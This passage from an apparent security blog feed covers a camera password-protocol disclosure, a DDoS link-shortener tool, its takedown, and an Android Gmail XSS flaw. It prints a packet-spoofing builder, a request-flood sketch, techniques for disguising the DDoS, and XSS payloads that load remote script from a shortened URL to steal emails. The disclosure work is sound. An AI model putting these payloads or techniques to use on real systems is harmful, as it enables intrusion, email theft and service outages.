packets), but the underlying protocol problem should still be present.
Wireshark/tcpdump are your friends; use them, and you should be able to
figure it out.&lt;/p&gt;
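&lt;p&gt;For the curious, the source spoofing that Scapy handles for you boils down to writing the IP and UDP headers yourself and pushing the result through a raw socket. A minimal stdlib sketch (the payload below is a stand-in, not the camera's actual change-password request bytes):&lt;/p&gt;

```python
import socket
import struct

def checksum(data):
    """RFC 791 ones'-complement sum over 16-bit big-endian words."""
    if len(data) % 2:
        data = data + b"\x00"
    total = 0
    for i in range(0, len(data), 2):
        total += int.from_bytes(data[i:i + 2], "big")
        carry, total = divmod(total, 0x10000)
        total = total + carry
    return 0xFFFF - total

def spoofed_udp(src_ip, dst_ip, sport, dport, payload):
    """Build a raw IPv4+UDP datagram with a forged source address."""
    # UDP header: src port, dst port, length, checksum (0 = none, legal on IPv4)
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    header = struct.pack("!BBHHHBBH4s4s",
                         0x45, 0, 20 + len(udp),      # version+IHL, TOS, total length
                         0, 0,                        # ID, flags/fragment offset
                         64, socket.IPPROTO_UDP, 0,   # TTL, protocol, checksum placeholder
                         socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    header = header[:10] + struct.pack("!H", checksum(header)) + header[12:]
    return header + udp

# Sending requires root and a raw socket, e.g.:
#   s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
#   s.sendto(pkt, ("192.0.2.50", 0))
pkt = spoofed_udp("203.0.113.7", "192.0.2.50", 13364, 13364, b"placeholder payload")
```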
&lt;p&gt;EDIT: The Metasploit people were kind enough to improve my module and
throw it into their SVN, so you can grab it there. Thanks, guys!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="disclosure"&gt;
&lt;h2&gt;Disclosure&lt;/h2&gt;
&lt;p&gt;The fact that this vulnerability appears to be a design issue that
requires both firmware and client software patches, combined with the
large number of affected devices, makes it very difficult (if not
impossible) to patch in any reasonable timeframe. This, together with
the confusion over who actually maintains this software, led me to
decide to release this before patching so users could protect themselves
by blocking access to port 13364. I did contact Rosewill prior to this
post, but have not yet received a reply.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-rest"&gt;
&lt;h2&gt;The Rest&lt;/h2&gt;
&lt;p&gt;If you have one of these devices, block all external access to UDP port
13364, regardless of what your user manual instructs you to do. If
attackers might have local network access, there is not much you can do
but cut it off from the rest of the network. Other cameras might be
different, but mine did not have an option to disable UDP management.&lt;/p&gt;
&lt;p&gt;I know cracking some of these embedded devices is a lot like beating a
three-year-old at a foot race, but it was a good way to occupy a few
hours. Hopefully I'll be back in a short while with more fun things to
do with a cheap IP camera; until then, peace.&lt;/p&gt;
&lt;/div&gt;
</summary><category term="ip camera"></category><category term="password disclosure"></category><category term="protocol analysis"></category><category term="vulnerabilities"></category></entry><entry><title>Weaponizing d0z.me: Improved HTML5 DDoS</title><link href="https://spareclockcycles.org/2011/03/27/weaponizing-d0z-me.html" rel="alternate"></link><updated>2011-03-27T22:57:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2011-03-27:2011/03/27/weaponizing-d0z-me.html</id><summary type="html">&lt;p&gt;Well, here we are, about three months since I &lt;a class="reference external" href="https://spareclockcycles.org/2010/12/19/d0z-me-the-evil-url-shortener/"&gt;initially released
d0z.me&lt;/a&gt;, and I've finally gotten away from school and life for a bit
this week and updated it. However, I think it was definitely worth the
wait. You can grab the code over at &lt;a class="reference external" href="http://code.google.com/p/d0z-me/"&gt;d0z.me's new Google Code
repository&lt;/a&gt;, and &lt;a class="reference external" href="http://d0z.me"&gt;see it in action here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Beyond making the backend code a little bit less of a disaster than it
was originally, I have also made the attack itself significantly more
effective. For the impatient among you, I will summarize the changes
here:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;More efficient web worker implementation for making the requests.&lt;/li&gt;
&lt;li&gt;Some cosmetic changes that make it less obvious that an attack is
occurring.&lt;/li&gt;
&lt;li&gt;Switched to POST requests by default, which allow us to hold server
threads longer and exhaust a target's bandwidth.&lt;/li&gt;
&lt;li&gt;Lots of updates to the backend code.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Before I go on though, I'd like to send another big THANK YOU to
Lavakumar Kuppan over at &lt;a class="reference external" href="http://andlabs.org"&gt;andlabs.org&lt;/a&gt; for his research, feedback, and
suggestions. His research was what originally inspired d0z.me, and he
has helped give me a few very useful suggestions on how to improve it.
Go follow &lt;a class="reference external" href="http://blog.andlabs.org"&gt;the andlabs blog&lt;/a&gt;. Also, thank you to everyone else who sent
in bug reports, suggestions, etc since I released it. You rock.&lt;/p&gt;
&lt;div class="section" id="web-worker-changes"&gt;
&lt;h2&gt;Web Worker Changes&lt;/h2&gt;
&lt;p&gt;My original implementation of the HTML5 DDoS attack did its job well,
but was not exactly polished. I had some ideas for speed improvements
even at the time, but hadn't spent much time optimizing. As it was, it
opened four web workers, each making only one request at a time. This
produced good results, but was very processor intensive for Firefox
users, and wasted valuable time waiting for a response from the server
at times. I also was unable to recreate the results from Lava's original
presentation (although this later turned out to be a flaw in my testing
procedure).&lt;/p&gt;
&lt;p&gt;After I released d0z.me, Lava contacted me and suggested instead that I
run one web worker and launch many simultaneous requests. Obviously,
running multiple requests at a time is much more efficient. With some
slight modifications to the pseudocode he provided (to ensure a full
request queue is maintained), I was able to achieve slightly better
speeds, using only two web workers instead of four.&lt;/p&gt;
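&lt;p&gt;The idea is just to keep a fixed number of requests in flight at all times, refilling the queue the moment anything completes. Sketched here in Python's asyncio rather than web-worker Javascript (the names and the stand-in request function are illustrative only):&lt;/p&gt;

```python
import asyncio

async def flood(request, total, concurrency=6):
    """Keep `concurrency` requests in flight until `total` have completed."""
    started = 0
    completed = 0
    pending = set()
    while completed != total:
        # Top the pipeline back up so a slow response never leaves it idle.
        for _ in range(min(concurrency, total - started) - len(pending)):
            pending.add(asyncio.ensure_future(request()))
            started += 1
        done, pending = await asyncio.wait(
            pending, return_when=asyncio.FIRST_COMPLETED)
        completed += len(done)
    return completed

async def fake_request():
    """Stand-in for one XHR; a real attack would POST to the target here."""
    await asyncio.sleep(0)

# asyncio.run(flood(fake_request, total=100))
```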
&lt;/div&gt;
&lt;div class="section" id="cosmetic-improvements"&gt;
&lt;h2&gt;Cosmetic Improvements&lt;/h2&gt;
&lt;p&gt;Originally, d0z.me also implemented an attack almost identical to that
of JSLOIC, constantly reloading an image in the background.
While it added a few extra requests per second, it was rather
insignificant compared to its HTML5 counterpart, could only perform GET
requests, and had the serious downside of displaying a progress bar in
some browsers. Because of this, it has now been removed. In addition,
d0z.me now attempts to pull the embedded site's favicon as its own, so
as to appear more legitimate. With these two changes, the URL becomes
the only way to tell the embedded site and d0z.me apart in most
browsers.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="using-post-requests-for-attack-amplification"&gt;
&lt;h2&gt;Using POST Requests for Attack Amplification&lt;/h2&gt;
&lt;div class="section" id="advantages-to-post-attack"&gt;
&lt;h3&gt;Advantages to POST Attack&lt;/h3&gt;
&lt;p&gt;One limitation of the original d0z.me implementation was that it could
do little in regards to consuming bandwidth. In addition, while it was
able to overwhelm servers with the sheer number of requests, server
threads were not held for very long. This meant that
it required a decent number of users to significantly affect performance
(by consuming all available threads, crashing the database, etc.).
Bandwidth and thread exhaustion are both commonly used DDoS techniques,
so why can't we do the same with HTML5 DDoS? Well, turns out, we can!&lt;/p&gt;
&lt;p&gt;While the original version of d0z.me used GET requests, we can also make
POST requests via CORS. We can issue roughly the same number of
requests per second as with GET, meaning that in most situations,
even without a payload, the effect will be similar. However, POST gives
us a number of advantages over GET that should be obvious.&lt;/p&gt;
&lt;p&gt;Unlike the previous version, however, attackers don't need to find large
files on the host to overwhelm the host's bandwidth. Given that the
default maximum request size is 2GB on Apache, we can send quite sizable
requests safely. Most configurations do, in fact, override this default,
but we can still send decently large requests regardless. To ensure that
it works on most hosts, d0z.me's attack is set to use a 1MB request
body. In practice, this is more than sufficient to generate excessive
amounts of traffic.&lt;/p&gt;
&lt;p&gt;Beyond the bandwidth advantages, we also tie up server threads for
much longer, as the host must receive the entire request before
responding. While this doesn't use a &amp;quot;slow POST&amp;quot; style attack like
&lt;a class="reference external" href="http://ha.ckers.org/slowloris/"&gt;Slowloris&lt;/a&gt;, it has a similar effect: tying up processing threads that
must receive the overly large requests, and thereby slowing down
response times drastically.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="f-ckin-cors-how-does-it-work"&gt;
&lt;h3&gt;F*ckin' CORS, How Does It Work?&lt;/h3&gt;
&lt;p&gt;So what hosts does this affect, you might ask? Just CORS enabled hosts,
right? Wrong.&lt;/p&gt;
&lt;p&gt;The &lt;a class="reference external" href="http://www.w3.org/TR/cors/"&gt;CORS working draft&lt;/a&gt; defines a series of steps that a browser
should go through when attempting to make a cross origin request. First,
it should check its cache to see if it has previously connected to this
URL within the cache timeout period and, if it has, whether or not
cross-origin requests were allowed on that URL. If they were, it can go
ahead and make the request; if not, the request process should stop
there. If, however, the URL is not in the cache, then the draft states
that the browser should make a &amp;quot;pre-flight request&amp;quot;, which is
essentially an empty request that seeks to get the headers for that
particular URL (see OPTIONS request). The exception to this rule,
however, is if the request is a &amp;quot;simple request&amp;quot;, i.e. a GET, HEAD, or
POST request.&lt;/p&gt;
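&lt;p&gt;In other words, whether a pre-flight happens at all comes down to a simple check. A much-simplified version of the draft's rules (the real algorithm has more cases, but the method and header whitelists below match the draft):&lt;/p&gt;

```python
SIMPLE_METHODS = {"GET", "HEAD", "POST"}
SIMPLE_HEADERS = {"accept", "accept-language", "content-language", "content-type"}
SIMPLE_CONTENT_TYPES = {"application/x-www-form-urlencoded",
                        "multipart/form-data", "text/plain"}

def needs_preflight(method, headers):
    """True if a cross-origin request triggers an OPTIONS pre-flight first."""
    if method.upper() not in SIMPLE_METHODS:
        return True
    for name, value in headers.items():
        if name.lower() not in SIMPLE_HEADERS:
            return True
        if name.lower() == "content-type" and value.lower() not in SIMPLE_CONTENT_TYPES:
            return True
    return False

# A plain cross-origin POST goes straight to the target, body and all:
assert not needs_preflight("POST", {"Content-Type": "text/plain"})
# ...while anything outside the "simple" set is pre-flighted:
assert needs_preflight("DELETE", {})
assert needs_preflight("POST", {"X-Custom": "1"})
```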
&lt;p&gt;This means that rather than respecting all that silly &amp;quot;pre-flight
request&amp;quot; nonsense when Javascript attempts to make a simple method
cross-origin request, the browser can decide to simply forward the
request along with whatever data was attached to it. That's right! We
can send arbitrary POST data to arbitrary hosts as fast as the network
allows. Clearly, this attack could pretty quickly inundate a host or
cause its owner significant bandwidth charges. This is not at all out of
reach of even small Twitter spam campaigns, and a hacked ad network
could rival the power of the largest botnets. Judging from some of the
traffic spikes I've seen in my few months with d0z.me (~300,000 hits one
week), one could fairly easily gather the amount of traffic necessary to
bring down sizable websites.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="final-notes"&gt;
&lt;h2&gt;Final Notes&lt;/h2&gt;
&lt;p&gt;I considered adding HTTP referrer / origin obfuscation support, which I
&lt;a class="reference external" href="https://spareclockcycles.org/2010/12/22/follow-up-on-d0z-me-some-thoughts/"&gt;previously demonstrated was possible&lt;/a&gt;. However, as my goal is not to
make d0z.me impossible to detect and block, and I still wanted people to
be able to find the site if abuse occurs, I decided against doing so. I
think it is sufficient that I have warned multiple times against using
that to block attacks. It's a band-aid, not a fix. I also considered
adding IE support, but the attack is significantly slower without the
benefit of web workers. When IE adds support for web workers, I will
attempt to add support for it.&lt;/p&gt;
&lt;p&gt;I have left GET requests in as an option, although I believe that it is
usually a less effective one. However, it may be better to use such an
attack if a host disallows all POST requests, or if a.) CORS is enabled
on the URL and b.) responding to that request causes the host to do a
significant amount of processing. The GET attack also uses significantly
less memory on machines viewing the link, which might be a consideration
in some instances.&lt;/p&gt;
&lt;p&gt;As I said earlier, it's been three months since I released d0z.me. As
far as I can tell, all it has achieved is &lt;a class="reference external" href="https://spareclockcycles.org/2011/03/18/doz-me-taken-down/"&gt;a GTFO message from
Dreamhost&lt;/a&gt; and a decent number of complaint emails. I do like to think
that it has raised awareness of some of the problems with URL
shorteners and HTML5, but no browsers have attempted to limit the
number of XHRs that can be made in a given time period (except *maybe*
Safari?), and no changes have been made to the CORS working draft. This
needs to be fixed.&lt;/p&gt;
&lt;p&gt;While I do find a lot of the issues involved here interesting, my main
reason for making this new release is to again encourage browser
developers and those working on the CORS draft to fix this problem, and
do it quickly. I hope it will also be useful for administrators to gauge
their systems' susceptibility to these attacks, as well as to come up
with defenses against them.&lt;/p&gt;
&lt;p&gt;As always, I certainly welcome any constructive criticisms or advice.
PHP/Javascript is not my forte, as I'm positive is obvious in the code,
so any tips from you gurus out there are much appreciated.&lt;/p&gt;
&lt;/div&gt;
</summary><category term="d0z.me"></category><category term="ddos"></category><category term="html5"></category></entry><entry><title>d0z.me Taken Down</title><link href="https://spareclockcycles.org/2011/03/18/doz-me-taken-down.html" rel="alternate"></link><updated>2011-03-18T00:57:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2011-03-18:2011/03/18/doz-me-taken-down.html</id><summary type="html">&lt;div class="line-block"&gt;
&lt;div class="line"&gt;This was not what was supposed to get posted this week, but sadly, this is what my time got spent on. From the &lt;a class="reference external" href="http://d0z.me"&gt;d0z.me&lt;/a&gt; main page:&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Hey all,
Dreamhost informed me today that they received complaints regarding
&lt;a class="reference external" href="http://d0z.me"&gt;d0z.me&lt;/a&gt;, which was not wholly unexpected. I would certainly have
appreciated it if the complaints had been forwarded to me, so that I
could take appropriate action; however, this did not occur. Dreamhost
also proceeded to notify me that d0z.me, as-is, violates their terms of
service. Unless I was willing to &amp;quot;ensure that (my) site can't be used to
actually DoS anyone&amp;quot;, I was told that I needed to remove the offending
content altogether or risk having the account shut down permanently.
While I do appreciate them contacting me before completely disabling my
account, I still think that this stance is unwarranted.&lt;/p&gt;
&lt;p&gt;d0z.me was never intended to be used as an attack tool. Rather, it was
meant as a proof-of-concept that served to both illustrate the dangers
posed by URL shorteners and HTML5, as well as to give concerned parties
an easy way to test detection/mitigation techniques for the attack. I
have quickly and consistently responded to all abuse requests I
received, and ensured that offending links were removed. Of course, this
could not prevent all abuse, and some certainly occurred. However, I
still believe that d0z.me was and is simply a tool, one that could be
used for positive ends or malicious ones, and should not be banned
simply because it can be misused.&lt;/p&gt;
&lt;p&gt;Given the situation, I have decided to temporarily take down the site
while I search for a host that is more willing to stand up for its
customers. As such, don't expect it to reliably be up over the next few
days. I don't believe that any kind of artificial limitation on d0z.me's
abilities will help prevent these kinds of attacks; rather, they will
encourage small, lesser known sites to join the fray, making for a
nearly impossible game of whack-a-d0z.me that would put users at more
risk. While of course this will most likely happen with the site down as
well, I at least will not have to waste my time crippling my code just
for that to occur.&lt;/p&gt;
&lt;p&gt;If you or someone you know would be willing to host d0z.me
permanently, please let me know at supernothing 4T spareclockcycles D0T
org. Feel free to &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/dosme.tar.gz"&gt;grab the code here&lt;/a&gt; and start your own version of
d0z.me as well, and help demonstrate the futility of censoring this
site. Whether or not I find a new host, I will continue making updates
to the d0z.me code, which will be posted on &lt;a class="reference external" href="https://spareclockcycles.org"&gt;my blog&lt;/a&gt;. I am currently
sidetracked a bit by this issue, but I have been working on definite
improvements that I will be releasing soon.&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Until then, &lt;a class="reference external" href="http://twitter.com/#!/_supernothing"&gt;follow me on Twitter for updates&lt;/a&gt;.&lt;/div&gt;
&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Peace,&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Ben Schmidt (supernothing)&lt;/div&gt;
&lt;div class="line"&gt;&lt;a class="reference external" href="https://spareclockcycles.org"&gt;https://spareclockcycles.org&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;EDIT: After looking through some hosting providers, I have temporarily
moved d0z.me to &lt;a class="reference external" href="https://nearlyfreespeech.net"&gt;nearlyfreespeech.net&lt;/a&gt; (thanks to &lt;a class="reference external" href="http://twitter.com/#!/piecritic"&gt;piecritic&lt;/a&gt; for
pointing it out). Hopefully they live up to their name and let it
be. We'll see how things go there, and I will move again if necessary.
If you can't get to it yet, it's because the DNS entries are still
propagating.&lt;/p&gt;
</summary><category term="censorship"></category><category term="d0z.me"></category><category term="ddos"></category><category term="hosting"></category></entry><entry><title>Android Gmail App: Stealing Emails via XSS</title><link href="https://spareclockcycles.org/2011/02/11/android-gmail-app-stealing-emails-via-xss.html" rel="alternate"></link><updated>2011-02-11T17:15:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2011-02-11:2011/02/11/android-gmail-app-stealing-emails-via-xss.html</id><summary type="html">&lt;p&gt;This post documents an XSS vulnerability that I discovered in the
default Gmail app (v1.3) provided by Google in Android 2.1 and prior.
All versions included in Android up to and including 2.1 seem to be
affected, but the bug was unintentionally patched in Froyo (2.2) when
Google updated the application to v2.3. The vulnerability let an
attacker execute arbitrary Javascript in a local context on the phone,
which made it possible to read the victim's emails (and the contacts
mentioned in those emails) off of the phone, download certain files to
the phone (and open them), and more easily perform various other attacks
that have previously been documented to take further control of the
phone. Less seriously, it was also possible to crash the application
repeatedly, resulting in a denial-of-service situation. The flaw has now
been fixed via a server-side patch to the Gmail API.&lt;/p&gt;
&lt;div class="section" id="discovery"&gt;
&lt;h2&gt;Discovery&lt;/h2&gt;
&lt;p&gt;During a night of drinking a couple months ago, I got into a discussion
with my roommate (&lt;a class="reference external" href="http://duststorm.org"&gt;his personal blog&lt;/a&gt;, cause I promised)&amp;nbsp;about what
characters are valid in email addresses. Although many filters only
allow [a-zA-Z0-9_-] plus maybe a few more as valid characters in the
local-part of the address, I was convinced that I had previously seen
email addresses that used characters outside of that character set, as
well as filters that allowed for a wider range of characters. As I
normally do during bouts of drinking, I immediately consulted the RFC to
settle the dispute (&lt;a class="reference external" href="http://tools.ietf.org/html/rfc5322"&gt;RFC 5322&lt;/a&gt;). Sure enough, it is apparently allowed,
but discouraged, under the RFC to have an email address in the following
format: &amp;quot;i&amp;lt;3whate\/er&amp;quot;&amp;#64;mydomain.com. As long as the quotation marks
are present, it is technically a valid email address.&lt;/p&gt;
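&lt;p&gt;A grossly simplified Python check illustrates the two forms the RFC allows for the local part; the &amp;quot;i&amp;lt;3whate\/er&amp;quot; address above matches the quoted-string branch. The character sets here are deliberately reduced for brevity, so this is a sketch of the rule, not a full RFC 5322 validator:&lt;/p&gt;

```python
import re

ATOM = re.compile(r"[A-Za-z0-9_+.-]+$")      # reduced atext set for brevity
QUOTED = re.compile(r'"(?:\\.|[^"\\])*"$')   # quoted-string: backslash escapes anything

def valid_local_part(local):
    """Accept a plain atom or an RFC 5322 quoted-string local part."""
    return bool(ATOM.match(local) or QUOTED.match(local))

assert not valid_local_part('spaces are illegal bare')
assert valid_local_part('"but fine once quoted"')
```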
&lt;p&gt;Seeing that this might trip up the ill-informed, I decided to see if
Gmail handled this case correctly. I wrote up a quick test in Python and
used one of the many open SMTP relays on campus (another rant for
another time) to shoot an email at my Gmail account. While the main
Gmail interface handled the problem with relative ease (there were some
small pattern matching issues when replying), I was a little surprised
to see something like the following when I opened the email on my phone:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2011/01/android_xss_initial2.png"&gt;&lt;img alt="Android XSS Initial" src="https://spareclockcycles.org/wp-content/uploads/2011/01/android_xss_initial2-200x300.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Clearly, there was an XSS vulnerability in the Gmail app. The root
cause, upon further investigation, was that the application was using
the raw source email address as an ID for the contact presence image
(the online/offline icon). An honest mistake, given the extremely
limited use of special characters in email addresses, but serious
nonetheless. To see if the issue affected all versions of Android, I
sent one to my roommate (who has Froyo), and one to my rather outdated
emulator running Android 1.5. The flaw was present in 1.5, but Froyo's
version was unaffected. I haven't tested on versions between 1.5 and
2.1, but I would assume that the bug has been present the entire time.
To prove that I could indeed execute Javascript, I first tried sending
an email with the following from address:&lt;/p&gt;
&lt;p&gt;&lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;window.location='http://google.com'&amp;lt;/script&amp;gt;&amp;quot;&amp;#64;somedmn.com&lt;/span&gt;&lt;/tt&gt;&lt;/p&gt;
&lt;p&gt;However, this email got blocked by Gmail's spam filters. Although at
first I thought that they might be aware of the vulnerability and had
tried to mitigate it, it quickly became apparent that it was simply
blocking all emails with &amp;quot;&amp;lt;&amp;quot; in the from address. Weird, but not a show
stopper. To get around this, I used the fact that the XSS was present in
the image tag and abused the onload attribute for execution:&lt;/p&gt;
&lt;p&gt;&lt;tt class="docutils literal"&gt;&amp;quot; &lt;span class="pre"&gt;onload=window.location='http://google.com'&amp;quot;&amp;#64;somedmn.com&lt;/span&gt;&lt;/tt&gt;&lt;/p&gt;
&lt;p&gt;Sure enough, the email got through, and when viewed, I ended up looking
at Google!&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2011/01/android_xss_google.png"&gt;&lt;img alt="Android XSS Google" src="https://spareclockcycles.org/wp-content/uploads/2011/01/android_xss_google-200x300.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="exploitation"&gt;
&lt;h2&gt;Exploitation&lt;/h2&gt;
&lt;p&gt;While redirecting to Google is fun and all, doing anything more
complicated required some work. Achieving arbitrary execution was
somewhat of a small challenge, given that the email address is limited
by the RFC to 254 characters in length, I could not use any &amp;quot;&amp;lt;&amp;quot; symbols
because of the Gmail filter, and I could not use any quotation marks in
the actual Javascript. To complicate matters, a simple
document.write(&amp;quot;&amp;lt;script&amp;gt;window.location='&lt;a class="reference external" href="http://google.com"&gt;http://google.com&lt;/a&gt;'&amp;lt;/script&amp;gt;&amp;quot;)
didn't work in this situation. However, in spite of these things, I was
able to throw together a payload that updates the DOM correctly and
creates a script tag with a remote source, weighing in at ~225
characters with the domain attached.&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Escaped:&lt;/div&gt;
&lt;div class="line"&gt;&lt;tt class="docutils literal"&gt;&amp;quot; &lt;span class="pre"&gt;onload='var&lt;/span&gt; f=String.fromCharCode;var d=document;var &lt;span class="pre"&gt;s=d.createElement(f(83,67,82,73,80,84));s.src=f(47,47,66,73,84,46,76,89,47,105,51,51,72,100,86);d.getElementsByTagName(f(72,69,65,68))[0].appendChild(s);'&lt;/span&gt; &amp;quot;&amp;#64;somedmn.com&lt;/tt&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Unescaped:&lt;/div&gt;
&lt;div class="line"&gt;&lt;tt class="docutils literal"&gt;&amp;quot; &lt;span class="pre"&gt;onload='var&lt;/span&gt; d=document;var &lt;span class="pre"&gt;s=d.createElement(&amp;quot;SCRIPT&amp;quot;);s.src=&amp;quot;//BIT.LY/i33HdV&amp;quot;;d.getElementsByTagName(&amp;quot;HEAD&amp;quot;)[0].appendChild(s);'&lt;/span&gt; &amp;quot;&amp;#64;somedmn.com&lt;/tt&gt;&lt;/div&gt;
&lt;/div&gt;
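&lt;p&gt;The fromCharCode encoding in the escaped payload is purely mechanical, so a small helper (hypothetical, not part of the original PoC) can generate it for any payload string that must avoid quotes:&lt;/p&gt;

```python
def char_codes(s):
    """Comma-separated code points: the argument list for String.fromCharCode."""
    return ",".join(str(ord(c)) for c in s)

def js_string(s):
    """Wrap a payload as a quote-free Javascript expression, assuming the
    payload has already aliased f = String.fromCharCode."""
    return "f(" + char_codes(s) + ")"

# Reproduces the two encoded strings used in the escaped payload:
print(js_string("SCRIPT"))           # f(83,67,82,73,80,84)
print(js_string("//BIT.LY/i33HdV"))  # f(47,47,66,73,84,46,76,89,47,105,51,51,72,100,86)
```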
&lt;p&gt;Of course, this is in all likelihood not the best way I could have done
this, but it worked well. I'd love to see better solutions if people
have them.&lt;/p&gt;
&lt;p&gt;EDIT: Here's a much cleaner and simpler version, courtesy of R (&lt;a class="reference external" href="https://spareclockcycles.org/2011/02/11/android-gmail-app-stealing-emails-via-xss/#comments"&gt;see
comments&lt;/a&gt;). I especially liked the use of an attribute for storing the
URL string.&lt;/p&gt;
&lt;p&gt;&lt;tt class="docutils literal"&gt;&amp;quot; &lt;span class="pre"&gt;title='http://bit.ly/i33HdV'&lt;/span&gt; &lt;span class="pre"&gt;onload='d=document;(s=d.createElement(/script/.source)).src=this.title;d.getElementsByTagName(/head/.source)[0].appendChild(s)'&lt;/span&gt; &amp;quot;&amp;#64;somedmn.com&lt;/tt&gt;&lt;/p&gt;
&lt;p&gt;With this in place, I could now do some more interesting things. First,
I dumped the page source so I could see better how exactly the
application worked. The Gmail app is closed source and the page is
dynamically generated in the Java code, so it was useful to get a dump
of that. I also grabbed the Gmail apk and unzipped it, which gave me
the Javascript API available to the application. I would provide this
code, but I don't want to get into any copyright issues by distributing
it here (it's pretty easy to get on your own, anyway). Finally, vaguely
following Thomas Cannon's wonderful guide on &lt;a class="reference external" href="http://thomascannon.net/projects/android-reversing/"&gt;Android reversing&lt;/a&gt;, I
decompiled the Java bytecode of the app to get a better idea of what I
might be able to do.&lt;/p&gt;
&lt;p&gt;Probably the easiest way to exploit this vulnerability would be simply
to launch a phishing attack that redirects users to a fake mobile Gmail
login page, in the hopes that they will happily log in to continue
viewing their emails. However, this was not a particularly interesting
or creative thing to do with the vulnerability, simple though it may be.&lt;/p&gt;
&lt;p&gt;After reading through some of the code, the main attack that jumped out
at me was to dump emails off the phone. Using some very simple
Javascript, one could simply grab all the emails on the phone and submit
them to a remote server. Doing things this way might not be practical in
a real attack though, given the time it would take to gather every email
on the device. A better technique is to utilize cross-origin requests,
sending each email to the attacker as soon as it is queried
(&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/android_xss_steal.js"&gt;naive demo code here&lt;/a&gt;). To give
the attacker more time to gather emails, one could run the dumping code
while also doing something like periodically spamming the user with
requests to add a contact, giving the attack precious time to collect
more data. Rather than dumping all the emails, though, a smarter use of
this exploit would be to reset a user's password for another service, and
then send an attack email soon afterwards. If the target opened it, we
could simply grab the last 2 or 3 emails and easily gain access to the
account we reset.&lt;/p&gt;
&lt;p&gt;In addition to the email dumping, some other interesting functions
caught my eye: download, preview, and showExternalResources. Although
not used anywhere in the script.js file that I grabbed from the apk
file, these methods were public in the decompiled Java API, meaning they
could be called via Javascript in the window. Using these functions with
the proper parameters, it was possible to download arbitrary files to
the phone without permission, cause external resources to be rendered,
and to automatically open various attached files (such as document
files). Obviously, all of these would provide an easy vector for various
attacks.&lt;/p&gt;
&lt;p&gt;Beyond these more serious problems, it was also possible to do various
odd things, like prompt the user to add a contact, set a label, open up
a new email to a target of our choosing, or automatically open up a
forward/reply message to an email. Overall though, the Javascript API in
the app did a fairly good job at preventing abuse, at least when
compared to platforms such as &lt;a class="reference external" href="http://www.eweek.com/c/a/Security/Researchers-Find-Security-Flaws-in-Palm-Smartphone-webOS-759999/"&gt;WebOS&lt;/a&gt;. I was unable in my tests to gain
unrestricted access to sending permissions or further compromise data on
the phone beyond the emails without using other vulnerabilities.&lt;/p&gt;
&lt;p&gt;One must also keep in mind that beyond these vulnerability-specific
threats, the flaw also allowed for much easier (and quieter)
exploitation of other vulnerabilities that have been found by other
researchers, including the &lt;a class="reference external" href="http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/"&gt;data-stealing bug&lt;/a&gt; and various arbitrary
code execution vulnerabilities in WebKit (like &lt;a class="reference external" href="http://www.exploit-db.com/exploits/15548/"&gt;this&lt;/a&gt;). It also allowed
for the exploitation of any number of file format bugs that might have
been found in the future. Exploiting any of these would be as easy as
getting a user to open up an email. Worse, the user would have no idea
until it was too late, as one could set the From header appropriately to
make the email look legitimate (i.e., to something other than Test :P):&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2011/01/android_xss_inbox2.png"&gt;&lt;img alt="Android XSS Inbox" src="https://spareclockcycles.org/wp-content/uploads/2011/01/android_xss_inbox2-200x300.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;And yes, that email executes arbitrary Javascript (shown here trying to
add the user &amp;quot;Test;--&amp;quot; to the contact list):&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2011/01/android_xss_add_contact.png"&gt;&lt;img alt="Android XSS Add Contact" src="https://spareclockcycles.org/wp-content/uploads/2011/01/android_xss_add_contact-200x300.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="disclosure"&gt;
&lt;h2&gt;Disclosure&lt;/h2&gt;
&lt;p&gt;I found the bug on 12/3/2010, and I contacted Google about 24 hours
after I discovered it and confirmed it was exploitable. I received a
quick initial response, but patching of the vulnerability on the server
side was not completed until 1/28/11, apparently because of decreased
staffing levels over the holiday. The patch was applied server-side in
the Gmail API, and works by converting the special characters into their
corresponding HTML entities. The Google security people were, as in all
my previous communications with them, polite and professional, and I
want to thank them for addressing the issue in a reasonable timeframe.&lt;/p&gt;
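&lt;p&gt;The fix, as described above, amounts to entity-encoding header values before they reach the inbox markup. Here is a minimal sketch of that kind of transformation (my reconstruction for illustration; Google's actual server-side code is not public):&lt;/p&gt;

```javascript
// Sketch of the kind of server-side fix described above (my reconstruction,
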